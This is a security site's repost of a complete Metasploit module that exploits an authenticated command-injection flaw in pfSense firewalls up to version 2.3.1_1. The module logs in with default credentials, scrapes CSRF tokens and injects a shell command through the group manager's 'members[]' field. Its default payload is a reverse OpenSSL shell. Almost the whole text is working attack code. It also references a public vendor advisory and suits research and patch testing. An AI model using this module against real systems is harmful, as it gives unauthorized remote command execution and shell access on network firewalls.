首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
pfSense 2.3.1_1 Remote Command Execution
来源:metasploit.com 作者:h00die 发布时间:2017-11-29  

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'        => 'pfSense authenticated group member RCE',
        'Description' => %q(
          pfSense, a free BSD based open source firewall distribution,
          version <= 2.3.1_1 contains a remote command execution
          vulnerability post authentication in the system_groupmanager.php page.
          Verified against 2.2.6 and 2.3.
        ),
        'Author'      =>
          [
            's4squatch', # discovery
            'h00die'     # module
          ],
        'References'  =>
          [
            [ 'EDB', '43128' ],
            [ 'URL', 'https://www.pfsense.org/security/advisories/pfSense-SA-16_08.webgui.asc']
          ],
        'License'        => MSF_LICENSE,
        'Platform'       => 'unix',
        'Privileged'     => false,
        'DefaultOptions' =>
          {
            'SSL' => true,
            'PAYLOAD' => 'cmd/unix/reverse_openssl'
          },
        'Arch'           => [ ARCH_CMD ],
        'Payload'        =>
          {
            'Compat' =>
              {
                'PayloadType' => 'cmd',
                'RequiredCmd' => 'perl openssl'
              }
          },
        'Targets'        =>
          [
            [ 'Automatic Target', {}]
          ],
        'DefaultTarget' => 0,
        'DisclosureDate' => 'Nov 06 2017'
      )
    )

    register_options(
      [
        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
        OptString.new('PASSWORD', [ false, 'Password to login with', 'pfsense']),
        Opt::RPORT(443)
      ], self.class
    )
  end

  def login
    res = send_request_cgi(
      'uri' => '/index.php',
      'method' => 'GET'
    )
    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200

    /var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body
    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
    vprint_status("CSRF Token for login: #{csrf}")

    res = send_request_cgi(
      'uri' => '/index.php',
      'method' => 'POST',
      'vars_post' => {
        '__csrf_magic' => csrf,
        'usernamefld'  => datastore['USERNAME'],
        'passwordfld'  => datastore['PASSWORD'],
        'login'        => ''
      }
    )
    unless res
      fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request")
    end
    if res.code == 302
      vprint_status('Successful Authentication')
      return res.get_cookies
    else
      fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
      return nil
    end
  end

  def detect_version(cookie)
    res = send_request_cgi(
      'uri' => '/index.php',
      'method' => 'GET',
      'cookie' => cookie
    )
    unless res
      fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request")
    end
    /Version.+<strong>(?<version>[0-9\.\-RELEASE]+)[\n]?<\/strong>/m =~ res.body
    if version
      print_status("pfSense Version Detected: #{version}")
      return Gem::Version.new(version)
    end
    # If the device isn't fully setup, you get stuck at redirects to wizard.php
    # however, this does NOT stop exploitation strangely
    print_error("pfSens Version Not Detected or wizard still enabled.")
    Gem::Version.new('0.0')
  end

  def check
    begin
      res = send_request_cgi(
        'uri'       => '/index.php',
        'method'    => 'GET'
      )
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
      if /Login to pfSense/ =~ res.body
        Exploit::CheckCode::Detected
      else
        Exploit::CheckCode::Safe
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end

  def exploit
    begin
      cookie = login
      version = detect_version(cookie)
      vprint_good('Login Successful')
      res = send_request_cgi(
        'uri'    => '/system_groupmanager.php',
        'method' => 'GET',
        'cookie' => cookie,
        'vars_get' => {
          'act' => 'new'
        }
      )

      /var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
      vprint_status("CSRF Token for group creation: #{csrf}")

      group_name = rand_text_alpha(10)
      post_vars = {
        '__csrf_magic' => csrf,
        'groupname' => group_name,
        'description' => '',
        'members[]' => "0';#{payload.encoded};'",
        'groupid' => '',
        'save' => 'Save'
      }
      if version >= Gem::Version.new('2.3')
        post_vars = post_vars.merge('gtype' => 'local')
      elsif version <= Gem::Version.new('2.3') # catch for 2.2.6. left this elsif for easy expansion to other versions as needed
        post_vars = post_vars.merge(
          'act' => '',
          'gtype' => '',
          'privid' => ''
        )
      end
      send_request_cgi(
        'uri'           => '/system_groupmanager.php',
        'method'        => 'POST',
        'cookie'        => cookie,
        'vars_post'     => post_vars,
        'vars_get' => {
          'act' => 'edit'
        }
      )
      print_status("Manual removal of group #{group_name} is required.")
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·osCommerce 2.3.4.1 - Arbitrary
·Android Gmail < 7.11.5.1765680
·Winamp Pro 5.66.Build.3512 - D
·KMPlayer 4.2.2.4 - Denial of S
·Exim 4.89 - 'BDAT' Denial of S
·ALLPlayer 7.5 - Local Buffer O
·Linux - 'mincore()' Uninitiali
·Microsoft Edge Chakra JIT Inco
·Microsoft Edge Chakra JIT Inli
·Microsoft Edge Chakra JIT Glob
·Microsoft Edge Chakra JIT Bail
·D-Link DIR-850L Credential Dis
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved